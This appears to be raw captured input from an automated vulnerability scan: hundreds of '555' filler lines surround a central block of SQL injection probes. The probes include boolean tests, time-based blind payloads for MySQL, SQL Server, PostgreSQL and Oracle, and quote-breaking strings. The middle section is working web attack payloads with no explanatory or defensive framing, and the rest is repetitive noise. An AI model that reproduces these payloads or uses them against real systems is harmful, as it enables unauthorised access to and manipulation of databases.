555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
-1 OR 2+560-560-1=0+0+0+1 --
555
555
-1 OR 3+560-560-1=0+0+0+1 --
555
555
-1 OR 3*2<(0+5+560-560) --
555
555
-1 OR 3*2>(0+5+560-560) --
555
555
-1 OR 2+432-432-1=0+0+0+1
555
555
-1 OR 3+432-432-1=0+0+0+1
555
555
-1 OR 3*2<(0+5+432-432)
555
555
-1 OR 3*2>(0+5+432-432)
555
555
-1' OR 2+687-687-1=0+0+0+1 --
555
555
-1' OR 3+687-687-1=0+0+0+1 --
555
555
-1' OR 3*2<(0+5+687-687) --
555
555
-1' OR 3*2>(0+5+687-687) --
555
555
-1' OR 2+28-28-1=0+0+0+1 or '2O1byYiz'='
555
-1 OR 2+635-635-1=0+0+0+1 --
-1' OR 3+28-28-1=0+0+0+1 or '2O1byYiz'='
555
-1 OR 3+635-635-1=0+0+0+1 --
-1' OR 3*2<(0+5+28-28) or '2O1byYiz'='
555
-1 OR 3*2<(0+5+635-635) --
-1' OR 3*2>(0+5+28-28) or '2O1byYiz'='
555
-1 OR 3*2>(0+5+635-635) --
-1" OR 2+69-69-1=0+0+0+1 --
555
-1 OR 2+966-966-1=0+0+0+1
-1" OR 3+69-69-1=0+0+0+1 --
555
-1 OR 3+966-966-1=0+0+0+1
-1" OR 3*2<(0+5+69-69) --
555
-1 OR 3*2<(0+5+966-966)
-1" OR 3*2>(0+5+69-69) --
555
-1 OR 3*2>(0+5+966-966)
555*if(now()=sysdate(),sleep(15),0)
555
-1' OR 2+396-396-1=0+0+0+1 --
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555
-1' OR 3+396-396-1=0+0+0+1 --
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
555
-1' OR 3*2<(0+5+396-396) --
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
-1' OR 3*2>(0+5+396-396) --
555-1; waitfor delay '0:0:15' --
555
-1' OR 2+134-134-1=0+0+0+1 or 'CI4DsWoQ'='
555-1); waitfor delay '0:0:15' --
555
-1' OR 3+134-134-1=0+0+0+1 or 'CI4DsWoQ'='
555-1)); waitfor delay '0:0:15' --
-1 OR 2+227-227-1=0+0+0+1 --
-1' OR 3*2<(0+5+134-134) or 'CI4DsWoQ'='
555-1 waitfor delay '0:0:15' --
-1 OR 3+227-227-1=0+0+0+1 --
-1' OR 3*2>(0+5+134-134) or 'CI4DsWoQ'='
555FX6fo2pB'; waitfor delay '0:0:15' --
-1 OR 3*2<(0+5+227-227) --
-1" OR 2+977-977-1=0+0+0+1 --
555zjCKxcIf'); waitfor delay '0:0:15' --
-1 OR 3*2>(0+5+227-227) --
-1" OR 3+977-977-1=0+0+0+1 --
555KokfLHMv')); waitfor delay '0:0:15' --
-1 OR 2+213-213-1=0+0+0+1
-1" OR 3*2<(0+5+977-977) --
555-1 OR 915=(SELECT 915 FROM PG_SLEEP(15))--
-1 OR 3+213-213-1=0+0+0+1
-1" OR 3*2>(0+5+977-977) --
555-1) OR 761=(SELECT 761 FROM PG_SLEEP(15))--
-1 OR 3*2<(0+5+213-213)
555*if(now()=sysdate(),sleep(15),0)
555-1)) OR 688=(SELECT 688 FROM PG_SLEEP(15))--
-1 OR 3*2>(0+5+213-213)
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555jWZwdL9z' OR 586=(SELECT 586 FROM PG_SLEEP(15))--
-1' OR 2+511-511-1=0+0+0+1 --
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
5551HK7ZUmM') OR 477=(SELECT 477 FROM PG_SLEEP(15))--
-1' OR 3+511-511-1=0+0+0+1 --
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555i268aITC')) OR 207=(SELECT 207 FROM PG_SLEEP(15))--
-1' OR 3*2<(0+5+511-511) --
555-1; waitfor delay '0:0:15' --
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
-1' OR 3*2>(0+5+511-511) --
555-1); waitfor delay '0:0:15' --
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
-1' OR 2+328-328-1=0+0+0+1 or '2rJSvFve'='
555-1)); waitfor delay '0:0:15' --
555
-1' OR 3+328-328-1=0+0+0+1 or '2rJSvFve'='
555-1 waitfor delay '0:0:15' --
555'"
-1' OR 3*2<(0+5+328-328) or '2rJSvFve'='
555gmko1Hi7'; waitfor delay '0:0:15' --
555ˤˢ%2527%2522\'\"
-1' OR 3*2>(0+5+328-328) or '2rJSvFve'='
555eX6iKXZr'); waitfor delay '0:0:15' --
@@38Zej
-1" OR 2+131-131-1=0+0+0+1 --
555c5CPnVlr')); waitfor delay '0:0:15' --
555
-1" OR 3+131-131-1=0+0+0+1 --
555-1 OR 446=(SELECT 446 FROM PG_SLEEP(15))--
555
-1" OR 3*2<(0+5+131-131) --
555-1) OR 614=(SELECT 614 FROM PG_SLEEP(15))--
555
-1" OR 3*2>(0+5+131-131) --
555-1)) OR 452=(SELECT 452 FROM PG_SLEEP(15))--
555
555*if(now()=sysdate(),sleep(15),0)
555FmbcWSVb' OR 46=(SELECT 46 FROM PG_SLEEP(15))--
555
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555UXgggFuw') OR 71=(SELECT 71 FROM PG_SLEEP(15))--
555
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
55543ixbHEj')) OR 135=(SELECT 135 FROM PG_SLEEP(15))--
555
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
555-1; waitfor delay '0:0:15' --
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555-1); waitfor delay '0:0:15' --
555
555
555-1)); waitfor delay '0:0:15' --
555'"
555
555-1 waitfor delay '0:0:15' --
555ˤˢ%2527%2522\'\"
555
555BidA7tMp'; waitfor delay '0:0:15' --
@@6Bovp
555
555YswhOOx2'); waitfor delay '0:0:15' --
555
555
555PXq94Hwh')); waitfor delay '0:0:15' --
555
555
555-1 OR 789=(SELECT 789 FROM PG_SLEEP(15))--
555
555
555-1) OR 367=(SELECT 367 FROM PG_SLEEP(15))--
555
555
555-1)) OR 464=(SELECT 464 FROM PG_SLEEP(15))--
555
555
555FNwexMDJ' OR 825=(SELECT 825 FROM PG_SLEEP(15))--
555
555
5551wKkAMz1') OR 655=(SELECT 655 FROM PG_SLEEP(15))--
555
555
555SanPZA3t')) OR 534=(SELECT 534 FROM PG_SLEEP(15))--
555
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
555
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555
555
555
555
555'"
555
555
555ˤˢ%2527%2522\'\"
555
555
@@DCaeJ
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555